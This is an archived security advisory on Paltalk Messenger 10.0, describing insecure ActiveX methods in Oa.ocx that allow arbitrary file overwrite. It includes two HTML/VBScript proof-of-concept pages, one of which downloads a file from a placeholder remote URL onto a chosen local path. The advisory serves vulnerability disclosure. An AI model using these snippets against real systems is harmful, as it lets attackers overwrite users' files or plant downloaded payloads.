exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Paltalk Messenger 10.0 Insecure Method

Paltalk Messenger 10.0 Insecure Method
Posted Jul 16, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

Paltalk Messenger version 10.0 suffers from an Active-X insecure method vulnerability.

tags | exploit, activex
SHA-256 | 3b4401939b9bca69589a54c90655ff168e700c9fd2e7f74591bc6d8108accfef

Paltalk Messenger 10.0 Insecure Method

Change Mirror Download
Vulnerability ID: HTB23026
Reference: http://www.htbridge.ch/advisory/paltalk_messenger_activex_control_multiple_insecure_methods.html
Product: Paltalk Messenger
Vendor: Paltalk ( http://www.paltalk.com )
Vulnerable Version: 10.0 and probably prior
Tested on: 10.0
Vendor Notification: 22 June 2011
Vulnerability Type: ActiveX control Insecure Method
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Paltalk Messenger, which can be exploited to overwrite arbitrary files.

1) The vulnerability is caused due to the Office Viewer ActiveX control (Oa.ocx) including the insecure "HttpDownloadFile()" method.
This can be exploited to overwrite arbitrary files in the context of the currently logged-on user by any file located on a remote http server.

The following PoC code is available:


<html>
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B9B5' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="http://URL/Filename"
arg2="FilePath\Filename_to_create"
target.HttpDownloadFile arg1 ,arg2
End Sub

</script>
</html>


2) The vulnerability is caused due to the Office Viewer ActiveX control (Oa.ocx) including the insecure "Save()" method.
This can be exploited to overwrite with junk data arbitrary files in the context of the currently logged-on user.


<html>
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B9B5' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
target.Save arg1
End Sub

</script>
</html>


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close